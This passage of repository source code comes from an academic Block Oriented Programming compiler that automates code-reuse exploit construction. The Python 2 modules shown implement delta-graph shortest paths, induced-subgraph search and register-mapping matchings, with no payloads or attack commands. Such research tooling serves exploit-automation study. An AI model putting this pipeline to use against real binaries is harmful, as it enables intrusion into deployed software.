---------------------------------------------------------------------\n    # Save results to file\n    # --------------------------------------------------------------------- \n    #  G.view()\n    \n    try:\n        G.save(filename + '.dot')\n        G.render(filename, view=True)\n    except IOError, err:\n        error(\"Cannot save figure: %s\" % str(err))\n        return False                            # failure\n\n    dbg_prnt(DBG_LVL_1, \"Done. Graph saved as %s\" % filename + '.pdf')\n \n    return True\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/delta.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# delta.py:\n#\n# This module is also the \"assistant\" of the symbolic execution engine along with the path module.\n# It implements the Delta Graph (DG). More details on the paper :)\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport path as P\n\nimport networkx as nx\nimport queue\nimport heapq\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\n# _NULL_NODE = -1                                     # null (non-existent) node\n_SINK_NODE = 0                                      # the sink node in delta graph\n    \n\n\n# -------------------------------------------------------------------------------------------------\n# _delta(): This class creates and processes the delta graph. Delta graph shows the distances \n#   (deltas) between accepted blocks.\n#\nclass delta( P._cs_ksp_intrl ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n        \n    # ---------------------------------------------------------------------------------------------\n    # __dijkstra_av(): This function finds the shortest path between source and destination \n    #       vertices using Dijkstra's algorithm. What's special about this algorithm, is that it\n    #       avoids all vertices and edges that have the \"avoid\" attribute set. \n    #\n    # :Arg src: The source node\n    # :Arg dst: The destination node\n    # :Ret: A tuple (dist, path) that contains the shortest distance and the shortest path as a \n    #   list of vertices. If such a path does not exist, function retuns (-1, []).\n    #\n    def __dijkstra_av( self, src, dst, extra=None ):\n        Q = queue.PriorityQueue()                   # implement it using a prioirty queue\n        dist, prev = { }, { }                       # intialize maps        \n        \n\n        if 'avoid' in self.__d.node[ src ]:         # if source vertex must be avoided,\n            return -1, []                           # abort\n\n\n        for vtx, _ in self.__d.nodes_iter(data=True):\n            if vtx != src:                          # for all vertices except source\n                dist[vtx], prev[vtx] = INFINITY, -1 # initialize distances to INF\n \n\n        # TODO: REPLACE PRIORITY QUEUE OBJECTS\n        dist[src], prev[src] = 0, _NULL_NODE        # source has distance 0\n        Q.put(src, dist[src])                       # add source vertex to the queue        \n    \n        ''' ------------------------------------------------------------------------- '''\n        ''' Main loop                                                                 '''\n        ''' ------------------------------------------------------------------------- '''\n        while not Q.empty():                        # while there are vertices in the queue\n            u = Q.get()                             # extract best vertex\n\n            if u == dst:                            # destination vertex found?\n                path, v = [], u                     # initialize vars\n                                \n                while v != _NULL_NODE:              # repeat until you reach the source\n                    path.insert(0, v)               # add vertex in reverse order\n                    v = prev[v]                     # move backwards\n\n                return dist[u], path                # success! return (dist,path)\n                \n\n            for v in self.__d.neighbors(u):         # for each adjacent vertex\n\n                # if this vertex or its edge must to be avoided, skip it\n                if 'avoid' in self.__d.node[ v ] or 'avoid' in self.__d[ u ][ v ]:\n                    continue\n\n\n                altd = dist[u] + self.__d[u][v]['weight']               \n                if altd < dist[v]:                  # if alternative path is shorter\n                    dist[v] = altd                  # use it\n                    prev[v] = u\n                    \n                    Q.put( v, altd )                # and add it to the queue\n\n\n        return -1, []                               # no path. Failure\n\n    '''\n    # ---------------------------------------------------------------------------------------------\n    # __cost(): Calculate the cost of a given path.\n    #\n    # :Arg path: Path to work on\n    # :Ret: An integer containing path's distance (cost).\n    #\n    def __cost( self, path ):\n        cost = 0\n    \n        if len(path) > 1:\n            for i in range(len(path) - 1):          # for each vertex in the path                           \n                cost += self.__d.edge[ path[i] ][ path[i + 1] ]['weight']\n\n        return cost\n    '''\n    \n    # ---------------------------------------------------------------------------------------------\n    # maxheap_obj: This class represents maximum-heap objects\n    # ---------------------------------------------------------------------------------------------\n    class __maxheap_obj( object ):\n        def __init__( self, tw, Hk ):           # store total weight and induced subgraph\n            self.tw = tw; self.Hk = Hk\n        \n        def __eq__( self, obj ):                # == operator: Compare total weights\n            return self.tw == obj.tw\n        \n        def __lt__( self, obj ):                # < operator: Invert condition\n            return self.tw > obj.tw             # with this trick min-heap becomes max-heap\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __enum_induced_subgraphs(): Enumerate all induced subgraphs with k nodes. Keep track of the\n    #   K minimum subgraphs by storing them on a max-heap. This function is recursive.\n    #\n    #   NOTE /!\\: Although this function has an exponential worst case complexity, in practice,\n    #       delta graphs are sparse so many of the combinations are truncated at the early stages.\n    #       In other words, this function is fast in practice.\n    #\n    # :Arg depth: The current recursion depth\n    # :Arg V: The current set of nodes that constitute the induced subgraph\n    # :Ret: None.\n    #\n    #\n    #   \n    # TODO: Optimization: When delta graph is flat, use Dijkstra\n    # \n    def __enum_induced_subgraphs( self, depth, V ):\n        # ---------------------------------------------------------------------\n        if depth == len(self.__bound):              # do we have a k-node induced subgraph      \n            Hk = nx.DiGraph()                       # Create the induced subgraph\n            Hk.add_nodes_from( V )\n\n            Vs = set(V)                             # cast list to set to optimize searching\n            tw = 0\n\n            # iterate over edges in __G and keep those who have both edges in the subgraph\n            for (u, v, w) in self.__G.edges_iter(data='weight'):\n                if u in Vs and v in Vs:\n\n                    # Induced subgraph nodes are indexed using (uid, addr) tuples\n                    Hk.add_edge(u, v, visited=False)\n                    tw += w                         # update total weight\n                    \n            if tw >= INFINITY:                      # discard subgraphs with INFINITY-weight edges\n                return 0\n\n            dbg_arb(DBG_LVL_3, \"Induced subgraph (Total Weight: %2d) found\" % tw, V)\n\n\n            if self.__k > 0:                        # if heap doesn't have enough subgraphs\n                heapq.heappush(self.__heap, self.__maxheap_obj(tw,Hk))\n                self.__k -= 1\n            else:                                   # otherwise keep the K minimum weight subgraphs\n                if self.__heap[0].tw >= tw:\n                    heapq.heappushpop(self.__heap, self.__maxheap_obj(tw,Hk))\n\n\n            # Enumerating all induced subgraphs can take O(2^n) time. Although we truncated many\n            # solutions, the worst case complexity is still remains.\n            #\n            # Therefore, if we hit an upper bound we simply stop the enumeration\n\n            self.__inc_ctr += 1\n            if MAX_ALLOWED_INDUCED_SUBGRAPHS != -1 and \\\n                self.__inc_ctr >= MAX_ALLOWED_INDUCED_SUBGRAPHS:\n                    return -1                           # maximum number of tries reached\n\n            return 0\n\n\n\n        # we always start from depth 1 (we have a single entry point)\n        cur = V[depth - 1]\n        uid = self.__uid[depth]\n\n\n        # ---------------------------------------------------------------------\n        for n in range(self.__bound[depth]):        # for each block in the current depth\n\n            # At this point we should check whether the selected node has an non-infinity\n            # distance with the others. This check is crucial as it can quickly eliminate\n            # most of the induced subgraphs.\n            #\n            # TODO: Elaborate.\n            #\n\n            nxt = self.__node_groups[depth][1][n]\n\n            #print self.__uid[depth], (cur, nxt)\n            #print self.__adj[ uid ]\n            #print self.__radj[ self.__uid[depth] ]\n\n            discard = False\n\n\n            # To problem here is the non-linearity. Although we're moving from depth X to X+1,\n            # it doesn't means that we're going from statement X to X+1.\n            #\n            # The idea is when add node X+1, to check whether all incoming edges (from already \n            # visited nodes) have non-infinity cost and whether all outgoing edges (from already \n            # visited nodes too) have non-infinity cost as well\n            #\n\n            if uid in self.__radj:                  # do the same with incoming edges\n                for x in self.__radj[ uid ]:\n                    y = self.__uid.index(x)\n\n                    if y >= depth:\n                        continue\n\n\n                    if not self.__G.has_edge(V[y], (uid,nxt)) or \\\n                        self.__G.get_edge_data(V[y], (uid,nxt))['weight'] == INFINITY:\n\n                            discard = True          # discard current solution\n                            break\n\n            if uid in self.__adj and not discard:   # check outgoing edges\n                for x in self.__adj[ uid ]:         # for each neighbor of of the next node\n                    y = self.__uid.index(x)         # check if it's already in visited\n\n                    if y >= depth:                  # TODO: >= or > ?\n                        continue                    # skip if not\n\n                    if not self.__G.has_edge((uid,nxt), V[y]) or \\\n                        self.__G.get_edge_data((uid,nxt), V[y])['weight'] == INFINITY:\n                            discard = True\n                            break\n\n\n            # if self.__G.get_edge_data(V[depth], \n            #                           self.__node_groups[depth][1][nxt])['weight'] != INFINITY:\n            if not discard:                \n                # recursively move on\n                if self.__enum_induced_subgraphs(depth + 1, V + [(uid,nxt)]) < 0:\n                    warn('Maximum number of induced subgraphs has been reached. '\n                         'Much Sad. Giving up recursing')\n                    return -1                       # quickly escape from recursions\n\n            # Node didn't work out. Try another one.\n\n        return 0\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Create delta graph delta(CFG, M_v)\n    #\n    # :Arg graph: CFG to work on\n    # :Arg entry: Payload's entry point\n    # :Arg accepted: Dictionary of accepted blocks\n    # :Arg clobbering: Dictionary of clobbering blocks\n    # :Arg adj: Dictionary of the adjacency lists for accepted blocks\n    #\n    def __init__( self, graph, entry, accepted, clobbering, adj):\n        \"\"\"\n        # A sample graph to test things\n\n        self.__G = nx.DiGraph()\n        self.__G.add_nodes_from( ['e', 'A1', 'B1', 'B2', 'B3', 'C1', 'D1', 'D2'] )\n\n        self.__G.add_edge( 'e',  'A1', weight=0)\n        self.__G.add_edge( 'A1', 'B1', weight=30)\n        self.__G.add_edge( 'A1', 'B2', weight=2)\n        self.__G.add_edge( 'A1', 'B3', weight=4)\n\n        self.__G.add_edge( 'B1', 'C1', weight=1)\n        self.__G.add_edge( 'B2', 'C1', weight=2)\n        self.__G.add_edge( 'B3', 'C1', weight=3)\n\n        self.__G.add_edge( 'C1', 'D1', weight=2)\n        self.__G.add_edge( 'C1', 'D2', weight=1)\n\n        self.__G.add_edge( 'D1', 'A1', weight=5)        \n        self.__G.add_edge( 'D2', 'A1', weight=4)\n        self.__G.add_edge( 'D2', 'B2', weight=1)\n\n        self.__G.add_edge( 'D1', 'B1', weight=INFINITY)\n        self.__G.add_edge( 'D1', 'B2', weight=INFINITY)\n        self.__G.add_edge( 'D1', 'B3', weight=INFINITY)\n        self.__G.add_edge( 'D2', 'B1', weight=INFINITY)\n        self.__G.add_edge( 'D2', 'B3', weight=INFINITY)\n\n        self.__node_groups = accepted\n\n        # if you use the sample graph, use these node groups\n        self.__node_groups = [(0, ['e']), (6, ['A1']), (8, ['B1', 'B2', 'B3']), (10, ['C1']), \n                                (14, ['D1', 'D2'])]\n\n        adj       = { }\n        adj[0 ]   = [6]\n        adj[ 6 ]  = [8]\n        adj[ 8 ]  = [10]\n        adj[ 10 ] = [14]\n        adj[ 14 ] = [6, 8]\n\n        # self.__G.node['C']['avoid'] = 1\n        print self.__G.edges()  \n        print accepted\n        print adj\n\n        self.__entry = 'e'\n        self.__adj   = adj                          # store adjacency list\n\n        return\n\n        \"\"\"\n        dbg_prnt(DBG_LVL_1, \"Creating Delta Graph...\")\n\n\n        assert(MAX_ALLOWED_INDUCED_SUBGRAPHS != 0)\n\n        self.__adj = adj                            # store adjacency list\n        self.__node_groups = accepted\n\n        self.__d = nx.DiGraph()                     # the delta graph       \n        self.__entry = entry                        # payload's entry point\n\n        super(self.__class__, self).__init__(\n            self.__d, \n            self.__dijkstra_av, \n            # TODO: USE SPUR_DIJKSTRA ;) <--- No b/c we use induced subgraphs?\n            lambda node : node                      # identity function (access graph directly)\n        )\n\n        # object for CFG shortest paths\n        # cfg = P._cfg_shortest_path(graph, clobbering, adj)\n\n        blacklist = set()                           # blacklisted nodes from Delta Graph\n\n\n        # build the reverse adjacency list\n        self.__radj = { }\n\n        for a, b in self.__adj.iteritems():\n            for c in b:\n                self.__radj.setdefault(c, []).append(a)\n\n\n        ''' ------------------------------------------------------------------------- '''\n        ''' Main loop                                                                 '''\n        ''' ------------------------------------------------------------------------- '''\n        # self.__d.add_node(entry)                  # add entry node\n\n        # Easter Egg: When entry is None, skip it and start directly from the 1st accepted block.\n        if entry != -1 and entry not in ADDR2NODE:  # check if entry point is valid\n            raise Exception('Entry point not found')\n\n\n        # for _, nxt in sorted(accepted.iteritems()):   # for each next level\n        for uid, cur in accepted:                   # for each next level\n\n            # if any node is not a valid basic block address, abort\n            if len(filter(lambda n : n not in ADDR2NODE and n != -1, cur)): \n                raise Exception('Node is not a valid address')\n\n\n            # filter out ndoes from current set\n            cur = [node for node in cur if (uid, node) not in blacklist]\n\n            \n\n            # The problem: It's possible for an accepted block, to be accepted for >1 statements.\n            # If we index nodes in Delta Graph using block addresses, we will end up reusing the\n            # same node at different \"levels\". \n            #\n            # To avoid this situation, we index nodes using a tuple (uid, address). \n            #\n            self.__d.add_nodes_from( zip([uid]*len(cur), cur) )\n\n                       \n            if uid not in self.__adj:               # the last layer (statement) has no neighbors\n                continue\n\n\n            for nxt in self.__adj[ uid ]:\n                # accepted = [(0, [4196485]), (6, [4197081L, 4196382]), ..., (24, [4196485])]\n\n                # get set of accepted blocks for the next statement\n                nxt_set2 = [b for (a, b) in accepted if a == nxt][0]\n\n                dbg_prnt(DBG_LVL_3, \"Delta Graph edges from (%d) '%s' to (%d) '%s'\" %\n                                        (uid, pretty_list(cur, ', '), \n                                         nxt, pretty_list(nxt_set2, ', ')))\n\n\n                nxt_set = [node for node in nxt_set2 if (nxt, node) not in blacklist]\n             \n                # if len(nxt_set) != len(nxt_set2):\n                #     warn('REDUCE FROM %d to %d' %(len(nxt_set2), len(nxt_set)))\n\n\n                # fully connect nodes from current to the next level (quadratic complexity)\n                for c in cur:                           # for each node in current level\n                    # print '-------------------------------------'\n                    \n                    # find paths to all nodes in the next level        \n                    cfg = P._cfg_shortest_path(graph, clobbering, adj)\n                    path = cfg.shortest_path(c, nxt_set, uid)\n\n                    # backdoor 2: wildcard return\n                    if len(nxt_set) == 1 and nxt_set[0] == -1: \n                        self.__d.add_edge((uid, c), (nxt, nxt_set[0]), weight=1)\n                        warn('ADD a wildcard return statement')\n                        del cfg\n                        continue\n\n\n                    # print '======================================='\n                    for n in range(len(nxt_set)):       # for each node in the next level\n                        # add an edge with cost their distance in CFG (or INF if edge does not exist)\n\n                        \n                        # Easter Egg checking\n                        if c == entry and entry == -1: \n                            self.__d.add_edge((uid, c), (nxt, nxt_set[n]), weight=0)                    \n\n                        # if next statement is on the same basic block\n                        # but next UID is smaller than current (we move backwards)\n                        elif c == nxt_set[n] and uid >= nxt:\n\n                            # find a loop (not a 0-distance path)\n                            loop, _ = cfg.shortest_loop(c, uid)\n\n                            self.__d.add_edge((uid, c), (nxt, nxt_set[n]), \n                                        weight=loop if loop >= 0 else INFINITY)\n                            pass\n\n                        else:\n                            # self.__d.add_edge(c, nxt_set[n], weight=path[n][0] \\\n                            #                           if path[n][0] >= 0  else INFINITY)\n                            #    \n\n                            self.__d.add_edge((uid, c), (nxt, nxt_set[n]), \n                                    weight=path[n][0] if path[n][0] >= 0 else INFINITY)\n\n                            pass\n\n                    del cfg\n\n\n                # -------------------------------------------------------------\n                # Optimization:\n                #\n                # Check if any nodes are totally disconnected from the previous\n                # layer. If so, they cannot be part of an induced subgraph, and\n                # therefore we can remove them.\n                # -------------------------------------------------------------\n                for n in range(len(nxt_set)):\n\n                    good = False\n\n                    for c in cur:\n                        if self.__d.has_edge((uid, c), (nxt, nxt_set[n])) and \\\n                            self.__d[(uid, c)][(nxt, nxt_set[n])]['weight'] != INFINITY:\n                                # n has at least one edge to the previous layer\n                                good = True\n\n                    if not good and self.__d.has_node( (nxt, nxt_set[n]) ):\n                    #    warn('edge (%d, %x) - (%d, %x) is missing. Add to blacklist.' % \n                    #           (uid, c, nxt, nxt_set[n]))\n                        self.__d.remove_node((nxt, nxt_set[n]))\n                        blacklist.add( (nxt, nxt_set[n]) )\n\n\n        '''\n        # NOTE: This is for flat delta graphs, where statement i goes to i+1\n\n        for a, nxt in accepted:                     # for each next level\n\n            print 'nxt', cur, nxt, a\n            # if any node is not a valid basic block address, abort\n            if len(filter(lambda n : n not in ADDR2NODE, nxt)): \n                raise Exception('Node is not a valid address')\n\n            self.__d.add_nodes_from( nxt )          # add nodes for the next level\n\n            # fully connect nodes from current to the next level (quadratic complexity)\n            for c in cur:                           # for each node in current level\n\n\n                print '-------------------------------------'\n                path = cfg.shortest_path(c, nxt)    # find paths to all nodes in the next level\n                print '======================================='\n                for n in range(len(nxt)):           # for each node in the next level\n                    # add an edge with cost their distance in CFG (or INF if edge does not exist)\n\n                    # TODO: remove cheating (backdoor)\n                    if c == entry: \n                        self.__d.add_edge(c, nxt[n], weight=7)                  \n\n                    else:\n                        self.__d.add_edge(c, nxt[n], weight=path[n][0] if path[n][0] >= 0 \\\n                                                                       else INFINITY)\n\n            cur = nxt                               # move 1 level deeper\n        '''\n\n\n        # because we don't care in which node we'll end up we add an additional sink node\n        # sink node is connected with all nodes in the last level\n        \n        # self.__d.add_node( _SINK_NODE )               # add sink node\n        # self.__d.add_edges_from( zip(nxt, [_SINK_NODE]*len(nxt)), weight=1 )\n\n        # at this point we have built delta graph\n\n        # print self.__d.edges(data=True)\n\n        dbg_prnt(DBG_LVL_1, \"Delta graph created\")\n        dbg_prnt(DBG_LVL_3, \"Edges:\")\n\n        for a,b,c in self.__d.edges(data=True): \n            if c['weight'] == INFINITY:                       # skip infinity edges\n                continue\n\n            dbg_prnt(DBG_LVL_3, \"%d:%Xh -> %d:%Xh = %s\" % (a[0], a[1], b[0], b[1], str(c)))\n\n\n        self.__G   = self.__d\n        self.graph = self.__d\n\n        # for n in self.__G.nodes():\n        #     print hex(n)\n        # exit()\n        \n\n\n    # ---------------------------------------------------------------------------------------------\n    # k_min_induced_subgraphs(): Find the K minimum k-induced subgraphs. Unfortunately we mess with\n    #       NP-hardness here. Even worse the problem can't be even approximated (see proof).\n    #       Therefore, a brute force is the only solution here. So, we calculate all the induced\n    #       subgraphs (that contain exactly 1 accepted block from each statement), and keep track\n    #       of the K minimum solutions (we use a max-heap to optimize that).\n    # \n    #\n    #       NP-hardness proof:\n    #           TODO: Copy proof from here (and explain why there are no approximations):\n    #           https://cs.stackexchange.com/questions/85077/minimum-weight-k-induced-subgraph\n    #\n    #\n    # :Arg K: The number of traces to search for (up to K)\n    # :Ret: Function is a generator and works exactly as super.k_shortest_paths(): Each time it\n    #       returns a tuple (tw, Hk) which is the minimum induced subgraph Hk of G, with a total\n    #       weight of tw. If such a subgraph does not exists, function return (-1, empty_graph).\n    #\n    def k_min_induced_subgraphs( self, K ):\n        self.__k = K                                    # number of induced subgraphs\n\n        # when delta graph is flat, a k shortest path approach is sufficient:\n        #\n        # return super(self.__class__, self).k_shortest_paths(self.__entry, _SINK_NODE, K)\n\n    \n        # list with number of accepted blocks from each statement\n        self.__bound = [len(x) for _, x in self.__node_groups]\n        self.__uid   = [y      for y, _ in self.__node_groups]\n\n        self.__heap = []\n        heapq._heapify_max(self.__heap)             # create a max-heap\n\n\n        dbg_prnt(DBG_LVL_3, \"Enumerating all induced subgraphs...\")\n\n        \n        # build the reverse adjacency list\n        self.__radj = { }\n\n        for a, b in self.__adj.iteritems():\n            for c in b:\n                self.__radj.setdefault(c, []).append(a)\n\n\n\n        dbg_arb(DBG_LVL_3, \"Adjacency List:\", self.__adj)\n        dbg_arb(DBG_LVL_3, \"Reverse Adjacency List:\", self.__radj)\n\n        # enumerate all induced subgraphs\n        self.__inc_ctr = 0\n        self.__enum_induced_subgraphs(1, [(0, self.__entry)] )\n        \n\n        dbg_prnt(DBG_LVL_3, \"Done. %d induced subgraphs found.\" % len(self.__heap))\n\n\n        inv  = []\n        none = True\n\n        while len(self.__heap):                     # for each minimum induced subgraph\n            obj = heapq.heappop(self.__heap)\n            inv.append(obj)                         # move objects from heap to a list\n\n\n        for obj in reversed(inv):                   # yield objects in reverse order\n            # print 'Inverse', obj.tw, obj.Hk.edges(data=True)\n\n            if obj.tw != INFINITY:\n                none = False\n                yield obj.tw, obj.Hk\n\n\n        if none:                                    # if you haven't return anything\n            yield -1, nx.empty_graph(create_using=nx.DiGraph())\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __enum_paths(): More recursion! This guy is the assistant for flatten_graph().\n    #\n    # :Arg curr: Current node\n    # :Arg graph: The induced subgraph\n    # :Arg P: Current path\n    # :Arg __visited: Current set of visited nodes\n    # :Arg F: Lambda function to encode nodes in P (needed for pretty-print situations)\n    # :Ret: P!\n    #\n    def __enum_paths( self, curr, graph, P, __visited, F=lambda x: x ):\n        if curr in __visited:\n            return P\n\n\n        # __visited.add(curr)\n\n        if len(graph.neighbors(curr)) == 1:\n            for n in graph.neighbors(curr):              \n                P = self.__enum_paths(n, graph, P+[(curr[0], F(curr[1]), F(n[1]))], __visited+[curr], F)\n                # P.append((curr, n))\n                \n\n        elif len(graph.neighbors(curr)) == 2:\n            n1, n2 = graph.neighbors(curr)\n            \n            # print n1, n2, self.__adj[curr[0]] \n\n            Q = self.__enum_paths(n1, graph, [(curr[0], F(curr[1]), F(n1[1]))], __visited+[curr], F)\n            R = self.__enum_paths(n2, graph, [(curr[0], F(curr[1]), F(n2[1]))], __visited+[curr], F)\n\n            # print 'Q IS', Q\n            # print 'R IS', R\n\n            # check if Q or R is the \"taken\" branch\n            # in adj the taken branch is always first\n            if self.__adj[curr[0]] == [n1[0], n2[0]]:\n                P.append([Q, R])                    # n1 is the \"taken\" branch\n            else:\n                P.append([R, Q])                    # n2 is the \"taken\" branch\n\n        else:\n            return P + [(curr[0], F(curr[1]), F(curr[1]))]\n\n        # print 'FINAL P', P\n        return P\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # flatten_graph(): Flatten the induced subgraph. Enumerate all paths and store them as \n    #   a tree of lists. \n    #\n    # :Arg graph: Current induced subgraph\n    # :Ret:\n    #\n    def flatten_graph( self, graph ):\n        '''\n        # self.__stack = ['e']\n        self.__visited = set()\n\n        graph = nx.DiGraph()\n    \n        graph.add_nodes_from( ['e', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7'] )\n\n        graph.add_edge( 'e',  'A2', weight=0)\n        graph.add_edge( 'A2', 'A3', weight=30)\n        graph.add_edge( 'A2', 'A4', weight=2)\n        graph.add_edge( 'A3', 'A5', weight=4)\n        graph.add_edge( 'A4', 'A7', weight=1)\n        graph.add_edge( 'A5', 'e',  weight=2)\n        graph.add_edge( 'A5', 'A6', weight=3)\n        graph.add_edge( 'A6', 'A7', weight=3)\n        graph.add_edge( 'A7', 'A2', weight=2)\n\n        P = self.__enum_paths('e', graph, [], [])\n\n        # print 'P', P\n        '''        \n        self.__visited = set()\n\n        P      = self.__enum_paths((0, self.__entry), graph, [], [])\n        pretty = self.__enum_paths((0, self.__entry), graph, [], [], lambda x: '%x' % x)\n                \n        # TODO: Distinguish between taken/not taken brances\n                \n        return P, pretty\n\n# -------------------------------------------------------------------------------------------------\n\n"
  },
  {
    "path": "source/map.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# map.py:\n#\n# This module is responsible for mapping IR's virtual registers and variables, to host registers \n# and addresses of the target binary. During graph marking, we create a bipartite graph that\n# contains the virtual registers on the one set and the host registers on the other. The edges \n# denote potential mappings. Furthermore, when a variable is passed as a reference to a virtual\n# register, we encode that mapping (variable <-> address) as weight of the corresponding edege.\n#\n# Finding one such mapping doesn't imply that trace search algorithm will find a solution. Hence,\n# we need to go back, find another mapping and try again. This creates the need to enumerate *all*\n# possible mappings. So for each register mapping, we extract the edge weights and we enumerate \n# *all* possible variable mappings. We use algorithm at [1] to make enumeration efficient.\n#\n# The time complexity for register mapping is O(1), because the register set is constant (8 virtual\n# registers and 16 host registers). For the variable mappings the time complexity is:\n# O(|E|*|V|^0.5 + |N|*A), where A = total number of possible matchings.\n#\n#\n# [1]. Uno, Takeaki. \"Algorithms for enumerating all perfect, maximum and maximal matchings in \n#       bipartite graphs.\" Algorithms and Computation (1997): 92-101.  \n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\n\nimport networkx as nx\nimport __builtin__                                  # to use the built-in map()\nimport copy\nimport re\n\n\n# -------------------------------------------------------------------------------------------------\n# _match: This class finds all maximum matchings in a given bipartite undirected graph by using\n#   the algorithm as described in [1]. Note that the optimization of trimming unnecessary edges \n#   from D(G,M) is not implemented, as this class works with small graphs.\n#\n#   This class uses a recursion to enumerate all matchings. So, every time a matching is found, a\n#   callback is invoked to process the matching. If the callback want to stop getting matchings, \n#   it should return a negative value.\n#\nclass _match( object ): \n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __D(): Generate directed graph D(G,M) as defined in the original paper. Let V1 = __r0, __r1, \n    #       etc. (host registers) and V2 = rax, rdx, rcx, etc. (virtual registers), if we're in\n    #       \"register\" mode, and Let V1 = $loc_2, etc. (variables) and V2 = 0x7ffff.... etc. \n    #       (addresses) if we're in \"variable\" mode.\n    #\n    # :Arg G: Undirected graph to work on.\n    # :Arg M: A maximum matching, as a list of tuples.\n    # :Ret: D(G,M) (directed).\n    #   \n    def __D( self, G, M ):\n        DG = nx.DiGraph()                           # create an empty directed graph        \n        DG.add_nodes_from(G.nodes())                # D(G,M) has the same vertices with G\n        DG.add_edges_from( M )                      # edges from M are directed from V1 to V2 in D\n        \n        for e in G.edges():                         # for each edge in G\n            if self.__opposite(e[0]):               # if edge is (host, virtual) or (addr, var)\n                e = (e[1], e[0])                    # swap it to (virtual, host) or (var, addr)\n                        \n            # print '!', e, M \n            if not e in M:                          # if edge not in M\n                DG.add_edge(e[1], e[0])             # add edge in reverse direction\n\n        return DG                                   # return D(G,M)\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __matchings_iter(): Given a graph G and a matching M, find another matching M' != M. This\n    #       is a recursive function which means that, it will find all matchings. If the callback\n    #       function wants to stop enumerations for some reason, all it has to do, is to return a \n    #       negative value and __matchings_iter() will stop producing more matchings.\n    #\n    # :Arg G: Graph to work on\n    # :Arg M: A list of tuples, containing a maximum matching\n    # :Arg D: The special graph D(G,M)\n    # :Ret: Under normal execution, function returns 0. If callback returns -1 at some point,\n    #   then function enters exit mode, which returns always -1.\n    #\n    def __matchings_iter( self, G, M, D ):  \n        if G.number_of_edges == 0:                  # if G has no edges,\n            return 0                                # stop (normal mode)\n        \n        try:                                        # look for a cycle in D(G,M)\n            cycle = nx.algorithms.find_cycle(D, orientation='original') \n\n            ''' --------------------------------------------------------------------- '''\n            ''' we have found a cycle                                                 '''\n            ''' --------------------------------------------------------------------- '''\n\n            # exchange matching edges with other edges in cycle\n            Mprime  = [(e[1], e[0]) for e in cycle if e not in M] \n            Mprime += [e for e in M if e not in cycle]\n\n            # remove tuples from bitvector strings\n            Mprime = __builtin__.map(lambda x : (x[0],x[1][0]) if isinstance(x[1], tuple)   \n                                                               else x, Mprime)\n\n\n            # M' (Mprime) is a new maximum matching. Invoke callback\n            if self.__callback( sorted(Mprime, key=lambda e: e[0]) ) < 0:\n                return -1                           # if callback wants to stop, stop\n            \n\n            # pick an edge e that is both in M and cycle (always exists)\n            e = [e for e in cycle if e in M][0]\n\n        except nx.exception.NetworkXNoCycle:        # D(G,M) has no cycles\n            ''' --------------------------------------------------------------------- '''\n            ''' no cycle. Look for a feasible path of length 2                        '''\n            ''' --------------------------------------------------------------------- '''\n\n            feasible = None\n\n            # for each uncovered node in D(G,M)\n            # b/c we're dealing with max matchings, uncovered nodes, are host registers\n            for u in list(set(D.nodes()) - set([vtx for e in M for vtx in e])):\n\n                # for each possible target vertex (different from source)\n                for v in [v for v in D.nodes() if u != v]:\n                    # If a vertex is uncovered, then (path[0], path[1]) is not in M. 